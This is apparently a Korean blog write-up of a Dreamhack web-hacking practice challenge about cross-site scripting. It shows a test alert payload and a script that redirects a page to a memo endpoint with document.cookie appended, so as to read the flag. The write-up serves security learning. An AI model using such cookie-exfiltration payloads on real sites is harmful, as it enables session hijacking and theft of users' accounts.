728x90
3개의 페이지가 있는걸 확인 할 수 있습니다.
첫번째 페이지에 들어가면 URL 주소에 스크립트가 적혀있고, 실행이 되는걸 볼 수 있습니다.
쿠키 값을 확인하기 위해 document.cookie 입력했지만, 쿠키값 없이 alert 경고창만 나옵니다.
두번째 페이지는 URL 주소 창에 문자열 입력시 회색칸에 적힌 문자가 텍스트 형식으로 출력이 됩니다.
마지막 페이지는 스크립트를 입력을 할수 있는 구문이 적혀있습니다.
<script>alert('xss');</script> 스크립트를 입력을 하면, good 이라는 경고창이 뜨면서 memo 페이지에 hello라는 텍스트가 적히는걸 확인할 수 있습니다.
내가 입력한 스크립트가 실행이되는지 확인을 할 수 없기 떄문에 출력 값을 memo 페이지로 보내 출력하도록 스크립트를 짜봤습니다.
<script>location.href="http://127.0.0.1:8000/memo?memo=hello"+document.cookie;</script> 스크립트를 입력해 쿠키값을 보내면 문제의 flag 값을 확인 할 수 있습니다.
'모의해킹 > Dreamhack' 카테고리의 다른 글
| devtools-sources [WEB LEVEL 1] (0) | 2023.03.22 |
|---|---|
| file-download-1 [WEB LEVEL 1] (0) | 2023.03.21 |
| simple_sqli [WEB LEVEL 1] (0) | 2023.03.20 |
| session-basic [WEB LEVEL 1] (0) | 2023.03.15 |
| cookie [WEB LEVEL 1] (0) | 2023.03.13 |
